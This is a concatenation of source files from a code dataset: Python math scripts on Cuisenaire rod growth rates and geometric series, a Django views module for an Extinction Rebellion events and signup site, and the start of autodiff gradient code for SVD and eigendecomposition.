print(\"xxx fpoly\", fpoly)\n# print(\"xxx\", coeffs)\n r1 = poly.polyroots(coeffs)\n maxroot = np.round(max(np.abs(r1)),10)\n theroots = list(np.round(np.abs(r1),3))\n rootlengths = list(set(theroots)) \n fpolystr = str(fpoly)\n fpolystr = fpolystr.replace(\"**\",\"^\").replace(\"*\",\"\").replace(\"^1 \",\"\").replace(\"1x\",\"x\") \n mypolystr = str(mypoly)\n mypolystr = mypolystr.replace(\"**\",\"^\").replace(\"*\",\"\").replace(\"^1 \",\"\").replace(\"1x\",\"x\").replace(\"^1-\",\"-\")\n# data.update({\"bits\":bits})\n data.update({\"spots\":input})\n data.update({\"growthrate\":maxroot})\n data.update({\"cpoly\":mypolystr})\n data.update({\"factors\":fpolystr})\n# data.update({\"roots\":theroots})\n data.update({\"rootlengths\":rootlengths}) \n return data\n\n# should rewrite this function to call rodsetattributes(input)\ndef csvout(input):\n ''' Print string with data about the input (bit string or rod set)\n suitable for spreadsheet input. 
\n Use '@' rather than a comma as the delimiter.\n '''\n if isinstance(input, str): # d is a bitstring like \"101\"\n bits = input\n elif isinstance(input, list):\n bits = spots2bitstring(input)\n else:\n print(f\"type error {input}\")\n return\n mypoly = build_recursion_polynomial(input)\n fpoly = factor(mypoly)\n coeffs = build_cuisenaire_poly_coefficients(input)\n r1 = poly.polyroots(coeffs)\n maxroot = np.round(np.abs(max(r1)),10)\n theroots = list(np.round(np.abs(r1),3))\n print(f\"{bits}@ {input}@ {maxroot}@ {mypoly}@ {fpoly} @ {theroots}\")\n return\n\ncsvheader=\"d@ spots@ growth rate@ poly@ factored@ |roots|\" \n\ndef growthratecsv(N):\n ''' Print spreadsheet input for odd plug numbers up to 2**N\n and for those numbers with prefixes 0, 00, 000 and 0000\n '''\n print(csvheader)\n for d in range(1, 1+2**N,2):\n todo = [bin(d)[2:], bin(2*d)[2:][::-1], bin(4*d)[2:][::-1],\n bin(8*d)[2:][::-1], bin(16*d)[2:][::-1] \n ]\n for bits in todo:\n csvout(bits)\n return\n\n# from //www.geeksforgeeks.org/itertools-combinations-module-python-print-possible-combinations/\ndef rSubset(arr, r):\n # return list of all subsets of length r\n # to deal with duplicate subsets use \n # set(list(combinations(arr, r)))\n return list(combinations(arr, r))\n\n# This should be refactored to call rodcount(limit, count)\ndef rodcountcsv( limit, count):\n ''' Print spreadsheet input for all cuisenaire rod sets of \n length up to limit using at most count rods\n '''\n# print(f\"count {count} limit {limit}\")\n print(csvheader)\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n csvout(list(spots))\n return \n\n# yyyyyyyyyy\ndef build_cuisenaire_poly_coefficients(rods):\n# degree = rods[len(rods)-1] # last entry\n# degree = max(rods)\n degree = max(max(rods),-min(rods))\n if degree==max(rods):\n globalsign = 1\n else:\n globalsign = -1\n coeffs = [0]*(degree+1)\n for r in rods:\n# print(r, sign(r)) \n# coeffs[degree-abs(r)] += -1\n coeffs[degree-abs(r)] -= sign(r)*globalsign\n# print(r, sign(r))\n coeffs[degree] = 1\n# print(coeffs)\n return coeffs\n\ndef get_cuisenaire_poly_roots(rods):\n coeffs = build_cuisenaire_poly_coefficients(rods)\n return np.array(poly.polyroots(coeffs))\n\ndef plotroots(rods):\n # plot the roots \n data = get_cuisenaire_poly_roots(rods)\n x = data.real\n y = data.imag\n\n # plot the circle through the largest root\n r = growthrate(rods);\n theta = np.linspace(0, 2*np.pi, 100)\n x1 = r*np.cos(theta)\n x2 = r*np.sin(theta)\n\n fig, ax = plt.subplots(1)\n ax.plot(x, y, 'b*')\n plt.xlabel(str(rods))\n ax.plot(x1, x2,'r')\n ax.set_aspect(1)\n plt.xlim(-2,2)\n plt.ylim(-2,2)\n\n plt.show() \n \ndef checkAP(spots, m):\n print(f\"{spots} + {m}k\")\n max = 80\n equiv = spots + list([m])\n equiv.sort()\n long = spots.copy()\n for r in spots:\n nextr = r+m\n while nextr < max:\n long.append(nextr)\n nextr += m\n long.sort()\n print(f\"{long} {growthrate(long)}\")\n print(f\"{equiv} {growthrate(equiv)}\")\n\ndef xfindfamilies( limit, count):\n ''' Collect cuisenaire rod sets of \n length up to limit using at most count rods\n into families keyed by growthrate.\n '''\n families = {} \n# print(f\"count {count} limit {limit}\")\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n if mygcd(spots) > 1:\n break\n attributes = rodsetattributes(list(spots))\n key = attributes.get(\"growthrate\")\n if 
families.get(key) == None:\n families[key] = [list(attributes[\"spots\"])]\n else:\n families[key].append(list(attributes[\"spots\"]))\n return families\n\ndef findfamilies( length, count):\n ''' Collect cuisenaire rod sets of \n length up to length using at most count rods\n into families keyed by growthrate.\n '''\n families = {}\n spotsetattributes = rodcountmultisets(length, count )\n for spots in spotsetattributes:\n \n# if len(spots['bits']) == 1:\n# continue\n key = spots.get(\"growthrate\")\n# print(key)\n if families.get(key) == None:\n# families[key] = spots\n families[key] = []\n families[key].append(spots)\n return families\n\n# zzzzzzzzzz\ndef rodcountmultisets( length, limit):\n ''' Create list of attributes for all cuisenaire rod multisets of \n length up to limit using at most count rods\n '''\n rodcounts = []\n spotsets = multi(length, limit)\n for spots in spotsets:\n if len(spots) == 1:\n continue\n# if mygcd(spots) > 1:\n# continue\n attributes = rodsetattributes(list(spots))\n rodcounts.append(attributes)\n return rodcounts\n\ndef rodcount( limit, count):\n ''' Create list of attributes for all cuisenaire rod sets of \n length up to limit using at most count rods\n '''\n rodcounts = []\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n# if mygcd(spots) > 1:\n# continue\n attributes = rodsetattributes(list(spots))\n rodcounts.append(attributes)\n return rodcounts\n\n\ndef findrodsfor(target, epsilon, rods=None):\n# print(f\"target {target} epsilon {epsilon} start {rods}\")\n if rods is None:\n rods = [1] \n g = growthrate(rods)\n if g > target:\n print(\"target smaller than start\")\n return rods\n while np.abs(target-g) > epsilon:\n while g < target:\n rods.append(rods[-1])\n g = growthrate(rods) \n rods[-1] = 1+rods[-1]\n g = growthrate(rods) \n# print(f\"{rods} {g}\")\n return(rods)\n\ndef findrodsclassicfor(target, epsilon):\n# print(f\"{target} {epsilon}\")\n rods = [1]\n g = growthrate(rods)\n print(f\"{rods} {g}\") \n while np.abs(target-g) > epsilon:\n rods.append(1+rods[-1])\n g = growthrate(rods)\n# print(f\"{rods} {g}\") \n while g > target:\n rods[-1] = 1+rods[-1]\n g = growthrate(rods)\n return(rods)\n\ndef hasduplicates(listOfElems, skipstart= 0):\n ''' Check if given list contains any duplicates \n ignoring first skipstart items\n '''\n return not len(listOfElems[skipstart:]) == len(set(listOfElems[skipstart:]))\n\ndef compareg(rods, extra):\n g = growthrate(rods)\n rods.append(extra)\n gx = growthrate(rods)\n return rods, extra, gx-g\n\ndef buildtree(rods, level):\n ''' find rod sets in the tree build by expanding\n the rods in R by R\n '''\n tree = [[rods]]\n for i in range(level):\n nextlevel =[]\n for rodset in tree[i]:\n for r in rodset:\n next = rodset.copy()\n next.remove(r)\n for s in rods:\n next.append(r+s)\n next.sort()\n nextlevel.append(next)\n tree.append(nextlevel)\n return tree\n\n\ndef commonexpansion(rods1, rods2, depth):\n from itertools import chain \n t1 = buildtree(rods1, depth);\n t2 = buildtree(rods2, depth);\n f1 = list(chain(*t1))\n f2 = list(chain(*t2)) \n return [value for value in f1 if value in f2] \n\ndef cpolyisminimal(rods):\n data = rodsetattributes(rods)\n return not \"(\" in data.get(\"factors\")\n\ndef getrandomrodset(length, candidates):\n rods = length*[0]\n for i in range(length):\n rods[-i] = random.choice(candidates)\n return list(sort(rods))\n\ndef countminimalcpolys(count, length, rodrange):\n ''' find the 
proportion of rod sets with minimal cpoly\n in a random selection of count rod sets of given length\n with elemens chosen from rodrange.\n '''\n minimalcount = 0\n for i in range(count):\n rods = getrandomrodset(length, rodrange)\n# print(i,rods)\n if cpolyisminimal(rods):\n minimalcount += 1\n# else:\n# print(rodsetattributes(rods))\n return minimalcount/count\n \n### code to execute here\nif __name__ == \"__main__\":\n\n## default:\n## Print details about rod set from command line\n \n if len(sys.argv) > 1: \n rodset = list(map(int, sys.argv[1:]))\n print(rodsetattributes( rodset))\n plotroots(rodset)\n\n\n## Print families with at least two members\n# Separator '@' instead of ',' smooths spreadsheet import from\n# csv file that's really now @sv\n# \n# families = findfamilies(3,4)\n# for f in families.values():\n# if len(f) > 2:\n# print(f\"{f[0]['growthrate']}\")\n# for i in range(len(f)):\n# cpoly = str(f[i]['cpoly'])\n# factors = str(f[i]['factors'])\n# print(f\"@{f[i]['spots']}@{cpoly}@{factors}\")\n\n\n##\n# print(\"countminimalcpolys(count=100, length=10, rodrange=range(1,n))\")\n# for n in range(10,100,5):\n# print(n, countminimalcpolys(count=100, length=10, rodrange=range(1,n)))\n# \n # rods = [1,2]\n# print(rods, cpolyisminimal(rods))\n# rods = [1,5]\n# print(rods, cpolyisminimal(rods))\n\n## Print the intersection of the trees from two rod sets\n# print(commonexpansion([1,3,3],[1,3,4,6,6],2))\n\n\n## Print the tree of expansions of a rod set to specified depth \n# rods = [2,3] \n# tree23 = buildtree(rods,3)\n# for level in tree23:\n# print(level)\n\n## Print the growthrate for a rod set\n# print(growthrate([1,3,4]))\n\n## Print the start of infinite rod set for a given growthrate\n# to specified precision with optional beginning\n# rate = growthrate([3,4])\n# eps = 0.0000001\n# print(findrodsfor(rate, eps))\n# print(findrodsfor(rate, eps, rods=[2]))\n# print(findrodsfor(rate, eps, [3])) \n\n######################################################################\n# \n# Only special purpose code from here on\n# \n# print(f\"{growthrate([1,10,20])}\")\n# print(f\"{growthrate([1,10,10,20])}\") \n# print(compareg([1,10,20], 10)) \n\n# check to see if we ever get nonclassic rod sets\n# start = 1.1\n# step = 0.001\n# epsilon = 0.00000001\n# count = 10\n# for i in range(count):\n# rate = start + i*step\n# rods = findrodsfor(rate, epsilon)\n# print(rods)\n# if hasduplicates(rods):\n# print(rate, rods)\n\n# eps = 0.00000001\n# rate = 1.6\n# print(findrodsfor(rate, eps))\n# print(findrodsfor(rate, eps, rods=[2]))\n# print(findrodsfor(rate, eps, rods=[3]))\n# print(findrodsfor(rate, eps, rods=[4]))\n# print(findrodsfor(rate, eps, rods=[2,5])) \n \n# print(hasduplicates([1,2,3]))\n# print(hasduplicates([1,2,2])) \n# print(findrodsfor(rate, eps,[2])) \n# print(findrodsfor(rate, eps,[3]))\n# print(findrodsfor(rate, eps,[4])) \n# print(findrodsclassicfor(rate,eps))\n\n \n# rods=[1]\n# for j in range(100):\n# rods.append\n# print(f\"{growthrate(rods)}\")\n\n \n# findrodsfor(3.5, 0.00000001)\n# findrodsfor(sqrt(2), 0.00000001)\n\n# families = findfamilies(2,50)\n# for f in families.values():\n# if len(f) > 1:\n# print()\n\n# put families into latex table\n# families = findfamilies(6,10)\n# for f in families.values():\n# if len(f) > 4:\n# print()\n# print(\"\\\\documentclass{standalone}\")\n# print(\"\\\\begin{document}\")\n# print()\n# print(\"\\\\begin{tabular}{llllllllllllllllllll}\")\n# allspots = list(f[i]['spots'] for i in range(len(f)))\n# allspots.sort(key=max)\n# allspots.sort(key=len) 
\n# row = len(allspots[0])\n# count = 0 \n# for spots in allspots:\n# if row != len(spots):\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\") \n# row = len(spots)\n# count = 0\n# if count > 7:\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\") \n# print(\"\", end=\"\")\n# count = 0\n# count += 1\n# print(\"$\"+str(spots).replace(\" \",\"\"), end=\"$ & \")\n# print()\n# print(\"\\\\end{tabular}\")\n# print(\"\\\\end{document}\") \n# testing sorting\n# ll = [[1, 6, 10],[1, 7, 8],[2, 4, 8],[2, 5, 6],[3, 3, 7],[3, 4, 5]]\n# print(ll)\n# ll.sort()\n# print(ll) \n# ll.sort(key=max)\n# print(ll) \n\n# families = findfamilies(3,3)\n# for f in families.values():\n# if len(f) > 1:\n# print(f\"{f[0]['growthrate']}\")\n# for i in range(len(f)):\n# cpoly = str(f[i]['cpoly']).replace(\"**\",\"^\")\n# cpoly = cpoly.replace(\"*\",\"\")\n# cpoly = cpoly.replace(\"^1\",\"\") \n# factors = str(f[i]['factors']).replace(\"**\",\"^\")\n# factors = factors.replace(\"*\",\"\")\n# factors = factors.replace(\"^1\",\"\") \n# print(f\"@{f[i]['spots']}@{cpoly}@{factors}\")\n\n\n# print\n\n# csvout([1,3])\n# csvout([3,5,5,5,6,7,7])\n# csvout([1,2,2,2,4])\n# print(rodsetattributes([1,2,2,2,4]))\n# csvout([1,3,4])\n# print(rodsetattributes([1,3,4]))\n \n# find all rod sets of length 2, extract growthrate and rods for excel\n# data = rodcount(40,2)\n# for spots in data:\n# if len(spots[\"spots\"]) == 2:\n# print(f\"{spots['spots']}@{spots['spots'][0]}@{spots['spots'][1]}@ {spots['growthrate']} \")\n \n","repo_name":"ktllee/plug_problem","sub_path":"cuisenaire/Ethan/cuisenaire.py","file_name":"cuisenaire.py","file_ext":"py","file_size_in_byte":19524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18323926243","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 等比数列.py\n# @Author: Lizi\n# @Date : 2020/12/23\n\n\nclass Geometric_series_based_iterator:\n def __init__(self, first=0, step=1, sequence_count=10):\n self._first = first\n self._step = step\n self._sequence_counter = sequence_count\n self._index = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self._index < self._sequence_counter:\n res = self._first * (self._step ** self._index)\n self._index += 1\n return res\n else:\n raise StopIteration\n\n\ndef geometric_series_based_generator(first=0, step=1, sequence_count=10):\n \"\"\"基生生成器函数的等差数列,与上面的代码功能完全相同\"\"\"\n for index in range(0, sequence_count):\n res = first * step ** index\n yield res\n index += 1\n\n\nif __name__ == '__main__':\n interator = Geometric_series_based_iterator(first=1, step=2, sequence_count=10)\n print(\"基于迭代器的等比数列的结果:\")\n for num in interator:\n print(num, end=' ')\n\n print(' ')\n\n generator = geometric_series_based_generator(first=1, step=2, sequence_count=10)\n print(\"基于生成器的等比数列的结果:\")\n for num in generator:\n print(num, end=' ')\n","repo_name":"rage-vampire/Python","sub_path":"lizi_project/built_in_function/iter+generaotr/等比数列.py","file_name":"等比数列.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74453147369","text":"import calendar\nimport csv\n\nfrom collections import defaultdict\nfrom datetime import timedelta, datetime\nfrom dateutil import tz\nfrom urllib.parse import urlencode\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib 
import messages\nfrom django.core import signing\nfrom django.db import IntegrityError\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils.html import strip_tags\nfrom django.utils.http import http_date\nfrom django.utils.timezone import now\nfrom django.urls import reverse\nfrom django.views.decorators.cache import never_cache, cache_page\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_protect\n\nfrom django import forms\nfrom phonenumber_field.formfields import PhoneNumberField\n\nfrom extinctionr.utils import get_last_contact, set_last_contact, get_contact\nfrom .models import Action, ActionRole, Attendee, TalkProposal\nfrom .comm import notify_commitments\n\n\nBOOTSTRAP_ATTRS = {'class': 'form-control text-center'}\n\nclass ActionForm(forms.ModelForm):\n class Meta:\n model = Action\n fields = ('name', 'when', 'description', 'public', 'location', 'tags', 'slug', 'accessibility')\n\n\nclass SignupForm(forms.Form):\n email = forms.EmailField(label=\"Email\", required=True, widget=forms.EmailInput(attrs={'class': 'form-control text-center', 'placeholder': 'Email Address'}))\n name = forms.CharField(label=\"Your name\", widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Your Name'}))\n promised = forms.BooleanField(required=False, widget=forms.CheckboxInput(attrs={'class': 'form-check'}))\n role = forms.ModelChoiceField(queryset=None, required=False, widget=forms.Select(attrs=BOOTSTRAP_ATTRS))\n next = forms.CharField(required=False, widget=forms.HiddenInput())\n notes = forms.CharField(required=False, initial='')\n commit = forms.IntegerField(required=False, initial=0, widget=forms.NumberInput(attrs={'class': 'form-control text-center', 'min': 0, 'max': 1000}))\n\n def __init__(self, *args, **kwargs):\n self.action = kwargs.pop('action')\n super().__init__(*args, **kwargs)\n self.fields['role'].queryset = qset = ActionRole.objects.filter(name__in=self.action.available_role_choices)\n if qset:\n self.fields['role'].required = True\n\n\nclass TalkProposalForm(forms.Form):\n location = forms.CharField(widget=forms.Textarea(attrs={'rows': 4, 'class': 'form-control', 'placeholder': 'Your location'}))\n name = forms.CharField(label=\"Your name\", required=True, widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Your Name'}))\n email = forms.EmailField(label=\"Email\", required=True, widget=forms.EmailInput(attrs={'class': 'form-control text-center', 'placeholder': 'Email Address'}))\n phone = PhoneNumberField(label=\"Phone Number\", required=False, widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Phone Number'}))\n\n\ndef _get_actions(request, whatever='', include_future=True, include_past=7):\n token = request.GET.get('token', '')\n req_date = request.GET.get('month','')\n tag_filter = request.GET.get('tag', '')\n context = {}\n today = now().date()\n current_date = today.replace(day=1)\n if token:\n try:\n user_id = signing.Signer().unsign(token)\n except signing.BadSignature:\n return HttpResponse(status=403)\n else:\n user = get_user_model().objects.get(pk=user_id)\n else:\n user = request.user\n actions = Action.objects.for_user(user)\n if whatever.isdigit():\n actions = actions.filter(pk=int(whatever))\n else:\n if req_date:\n current_date = datetime.strptime(req_date, '%Y-%m')\n context['is_cal'] = True\n start_date = current_date - 
timedelta(days=include_past)\n if not include_future:\n end_date = start_date + timedelta(days=38)\n else:\n end_date = start_date + timedelta(days=3650)\n actions = actions.filter(when__date__range=(start_date, end_date))\n if tag_filter:\n actions = actions.filter(tags__name=tag_filter)\n context['current_tag'] = tag_filter\n context['is_cal'] = True\n context['current_date'] = current_date\n context['today'] = today\n return actions, context\n\n\ndef calendar_view(request, whatever):\n from ics import Calendar, Event\n actions, ctx = _get_actions(request, include_future=True, include_past=30)\n thecal = Calendar()\n thecal.creator = 'XR Mass Events'\n for action in actions:\n evt = Event()\n evt.uid = '{}@{}'.format(action.id, request.get_host())\n evt.name = action.html_title\n evt.description = action.description\n evt.categories = action.tags.names()\n evt.last_modified = action.modified\n evt.url = request.build_absolute_uri(action.get_absolute_url())\n evt.begin = action.when\n evt.duration = timedelta(hours=1)\n # evt.end = action.when + timedelta(hours=1)\n evt.location = action.location\n thecal.events.add(evt)\n response = HttpResponse(thecal, content_type='text/calendar')\n return response\n\n\n@cache_page(1200)\n@csrf_protect\ndef list_actions(request):\n can_add = request.user.has_perm('actions.add_action')\n if request.method == 'POST' and can_add:\n form = ActionForm(request.POST)\n if form.is_valid():\n action = form.save()\n return redirect(action.get_absolute_url())\n else:\n print(form.errors)\n\n qset, ctx = _get_actions(request, include_future=False)\n if not ctx.get('is_cal'):\n actions = Action.objects.for_user(request.user).filter(when__gte=now())\n ctx['upcoming'] = actions[:6]\n else:\n actions = None\n current_date = ctx['current_date']\n ctx['next_month'] = current_date + timedelta(days=31)\n ctx['last_month'] = current_date + timedelta(days=-1)\n\n cal_days = list(calendar.Calendar(firstweekday=6).itermonthdates(current_date.year, current_date.month))\n this_month = []\n this_week = []\n month_actions = defaultdict(list)\n\n for action in qset:\n # Convert day to local day so actions land in the right day for current view.\n day = action.when.astimezone(tz.tzlocal()).date()\n month_actions[day].append(action)\n\n event_colors = {\n 'talk': 'xr-bg-pink',\n 'action': 'xr-bg-green',\n 'ally': 'xr-bg-light-green',\n 'meeting': 'xr-bg-lemon',\n 'orientation': 'xr-bg-purple',\n 'art': 'xr-bg-warm-yellow',\n 'nvda': 'xr-bg-light-blue',\n 'regen': 'xr-warm-yellow xr-bg-dark-blue',\n }\n for daynum, mdate in enumerate(cal_days, 1):\n todays_actions = month_actions[mdate]\n obj = {\n 'day': mdate,\n 'events': todays_actions,\n 'bg': '',\n }\n if mdate.month == current_date.month:\n for a in todays_actions:\n tagnames = a.tags.names()\n for t in a.tags.names():\n color = event_colors.get(t, None)\n if color:\n obj['bg'] = color\n break\n else:\n # previous month\n obj['bg'] = 'bg-light'\n if mdate == ctx['today']:\n obj['today'] = True\n this_week.append(obj)\n if daynum % 7 == 0:\n this_month.append(this_week)\n this_week = []\n if this_week:\n this_month.append(this_week)\n ctx['month'] = this_month\n ctx['can_add'] = can_add\n if ctx['can_add']:\n ctx['form'] = ActionForm()\n calendar_link = 'webcal://{}/action/ical/XR%20Mass%20Events'.format(request.get_host())\n link_pars = {}\n if request.user.is_authenticated:\n link_pars['token'] = signing.Signer().sign(request.user.id)\n if ctx.get('current_tag'):\n link_pars['tag'] = ctx.get('current_tag')\n 
ctx['calendar_link'] = calendar_link + '?' + urlencode(link_pars)\n resp = render(request, 'list_actions.html', ctx)\n resp['Vary'] = 'Cookie'\n\n if request.user.is_authenticated:\n resp['Cache-Control'] = 'private'\n if actions:\n resp['Last-Modified'] = http_date(actions.last().when.timestamp())\n return resp\n\n\n\n@cache_page(1200)\ndef show_action(request, slug):\n action = get_object_or_404(Action, slug=slug)\n ctx = {'action': action}\n if request.user.is_authenticated:\n ctx['attendees'] = Attendee.objects.filter(action=action).select_related('contact').order_by('-mutual_commitment', '-promised', 'pk')\n ctx['promised'] = ctx['attendees'].filter(promised__isnull=False)\n ctx['default_to_email'] = settings.DEFAULT_FROM_EMAIL\n if action.when < now() and action.public:\n # don't allow signups for public actions that already happened\n ctx['already_happened'] = True\n form = None\n elif request.method == 'POST':\n form = SignupForm(request.POST, action=action)\n if form.is_valid():\n data = form.cleaned_data\n commit = abs(data['commit'] or 0)\n atten = action.signup(data['email'],\n data['role'],\n name=data['name'][:100],\n promised=data['promised'],\n commit=commit,\n notes=data['notes'])\n next_url = data['next'] or request.headers.get('referer', '/')\n messages.success(request, \"Thank you for signing up for {}!\".format(action.html_title))\n if commit:\n messages.info(request, \"We will notify you once at least %d others commit\" % commit)\n set_last_contact(request, atten.contact)\n return redirect(next_url)\n else:\n contact = get_contact(email=request.user.email) if request.user.is_authenticated else get_last_contact(request)\n initial = {}\n if contact:\n initial['email'] = contact.email\n initial['name'] = str(contact)\n form = SignupForm(action=action, initial=initial)\n ctx['form'] = form\n ctx['has_roles'] = list(action.available_role_choices)\n ctx['photos'] = list(action.photos.all())\n resp = render(request, 'action.html', ctx)\n resp['Vary'] = 'Cookie'\n resp['Last-Modified'] = http_date(action.modified.timestamp())\n if request.user.is_authenticated:\n resp['Cache-Control'] = 'private'\n return resp\n\n\n@never_cache\ndef show_attendees(request, action_slug):\n action = get_object_or_404(Action, slug=action_slug)\n out_fmt = request.GET.get('fmt', 'json')\n attendees = Attendee.objects.filter(action=action).select_related('contact').order_by('contact__last_name')\n num = attendees.count()\n if num > 10:\n half = int(num / 2)\n else:\n half = None\n if out_fmt == 'html':\n resp = HttpResponse('not allowed')\n\n # ctx = {'attendees': attendees, 'half': half, 'can_change': request.user.is_staff, 'slug': action_slug}\n # resp = render(request, 'attendees.html', ctx)\n elif out_fmt == 'csv' and request.user.has_perm('actions.view_attendee'):\n attendees = attendees.order_by('created')\n resp = HttpResponse()\n resp['Content-Type'] = 'text/csv'\n csv_writer = csv.writer(resp)\n header = ('Email', 'First Name', 'Last Name', 'Phone', 'Promised', 'Created')\n csv_writer.writerow(header)\n for attendee in attendees:\n csv_writer.writerow((attendee.contact.email, attendee.contact.first_name, attendee.contact.last_name, attendee.contact.phone, attendee.promised, attendee.created.isoformat()))\n return resp\n\n\n@login_required\ndef send_notifications(request, action_slug):\n action = get_object_or_404(Action, slug=action_slug)\n if request.method == 'POST':\n threshold = int(request.POST['threshold'])\n action_url = request.build_absolute_uri(reverse('actions:action', 
kwargs={'slug': action_slug}))\n num = notify_commitments(action, threshold, action_url)\n if num:\n messages.success(request, 'Notified %d attendees of their commitment!' % num)\n return redirect(action.get_absolute_url())\n\n\ndef propose_talk(request):\n ctx = {}\n if request.method == 'POST':\n form = TalkProposalForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n prop = TalkProposal.objects.propose(\n strip_tags(data['location']),\n data['email'],\n phone=data['phone'],\n name=data['name'])\n ctx['created'] = prop\n messages.success(request, 'Thank you, {}!'.format(prop.requestor))\n messages.info(request, 'Somebody from Extinction Rebellion will contact you soon to arrange a talk at {}'.format(prop.location))\n set_last_contact(request, prop.requestor)\n return redirect(reverse('extinctionr.actions:talk-proposal'))\n else:\n contact = get_last_contact(request)\n initial = {}\n if contact:\n initial['email'] = contact.email\n initial['name'] = str(contact)\n initial['phone'] = contact.phone\n form = TalkProposalForm(initial=initial)\n ctx['form'] = form\n return render(request, 'talkproposal.html', ctx)\n\n\n@login_required\ndef mark_promised(request, action_slug):\n if request.user.has_perm('action.change_attendee'):\n attendee = get_object_or_404(Attendee, pk=request.POST['id'], action__slug=action_slug)\n if not attendee.promised:\n attendee.promised = now()\n attendee.save()\n return JsonResponse({'status': 'ok'})\n\n\n@login_required\n@never_cache\ndef list_proposals(request):\n ctx = {\n 'talks': TalkProposal.objects.select_related('requestor').order_by('-responded', 'created')\n }\n template = 'list_talks'\n if request.GET.get('format', 'html') == 'csv':\n template += '.csv'\n content_type = 'text/csv'\n content_disposition = 'attachment; filename=\"talks.csv\"'\n else:\n template += '.html'\n content_type = 'text/html'\n content_disposition = None\n response = render(request, template, ctx)\n response['content-type'] = content_type\n if content_disposition:\n response['content-disposition'] = content_disposition\n return response\n\n\n\n@login_required\n@never_cache\ndef talk_respond(request, talk_id):\n talk = get_object_or_404(TalkProposal, pk=talk_id)\n if request.method == 'POST' and not talk.responded:\n talk.responded = now()\n talk.responder = request.user\n talk.save()\n return JsonResponse({'id': talk.id})\n\n\n@login_required\n@never_cache\ndef convert_proposal_to_action(request, talk_id):\n talk = get_object_or_404(TalkProposal, pk=talk_id)\n if request.method == 'POST' and talk.responded:\n act = Action()\n act.name = \"XR Talk at {}\".format(talk.location.strip())\n act.when = now() + timedelta(days=7)\n act.public = False\n act.description = '''Heading to extinction (and what to do about it)\n\nThis talk will be at {}\n'''.format(talk.location)\n act.slug = 'xr-talk-%d' % talk.id\n try:\n act.save()\n except IntegrityError:\n act = Action.objects.get(slug=act.slug)\n url = '/admin/actions/action/%d/change/' % act.id\n return JsonResponse({'next': url})\n\n","repo_name":"davestgermain/extinctionr","sub_path":"extinctionr/actions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11175081838","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tadpole.util as util\nimport tadpole.autodiff as ad\nimport tadpole.tensor as tn\n\nimport tadpole.linalg.unwrapped as la\n\nfrom tadpole.index import (\n 
Index,\n IndexGen, \n IndexLit,\n Indices,\n)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of tensor decompositions ###\n### ###\n###############################################################################\n\n\n# --- Helpers: identity matrix ---------------------------------------------- #\n\ndef eye(x, inds=None): \n\n if inds is None:\n return tn.space(x).eye()\n\n sind = IndexLit(inds[0], x.shape[0])\n sind1 = IndexLit(inds[1], x.shape[-1])\n\n return tn.space(x).eye(sind, sind1)\n\n\n\n\n# --- Helpers: F-matrix ----------------------------------------------------- #\n\ndef fmatrix(s): \n\n seye = eye(s,\"ij\")\n sdiff = s(\"1j\") - s(\"i1\") + seye\n\n return sdiff / (sdiff**2 + 1e-12) - seye\n\n\n\n\n# --- SVD ------------------------------------------------------------------- #\n\ndef vjp_svd(g, out, x, sind=None, trunc=None):\n\n \"\"\"\n https://arxiv.org/pdf/1909.02659.pdf\n\n Eq. 1, 2, 36 (take complex conjugate of both sides)\n\n \"\"\"\n\n du, ds, dv = g[0], g[1], g[2].H\n u, s, v = out[0], out[1], out[2].H\n\n f = fmatrix(s**2)(\"ij\")\n\n uTdu = u.T(\"im\") @ du(\"mj\")\n vTdv = v.T(\"im\") @ dv(\"mj\")\n\n grad = eye(s,\"ij\") * ds(\"i1\") \n grad = grad + f * s(\"1j\") * (uTdu(\"ij\") - uTdu.H(\"ij\")) \n grad = grad + f * s(\"i1\") * (vTdv(\"ij\") - vTdv.H(\"ij\"))\n \n\n if tn.iscomplex(x):\n grad = grad + 1j * tn.imag(eye(uTdu) * uTdu) / s(\"1j\")\n\n\n grad = u.C(\"li\") @ grad(\"ij\") @ v.T(\"jr\") \n\n\n if x.shape[0] < x.shape[1]: \n\n vvH = v(\"bm\") @ v.H(\"mr\")\n grad = grad \\\n + ((u(\"la\") / s(\"1a\")) @ dv.T(\"ab\") @ (eye(vvH) - vvH)).C\n\n return grad(*tn.union_inds(x))\n\n\n if x.shape[0] > x.shape[1]:\n\n uuH = u(\"bm\") @ u.H(\"ml\")\n grad = grad \\\n + ((v(\"ra\") / s(\"1a\")) @ du.T(\"ab\") @ (eye(uuH) - uuH)).T\n\n return grad(*tn.union_inds(x))\n\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Eigendecomposition (general) ------------------------------------------ #\n\ndef vjp_eig(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/1701.00392\n \n Eq. 4.77 (take complex conjugate of both sides)\n\n \"\"\"\n\n dv, ds = g\n v, s = out\n\n f = 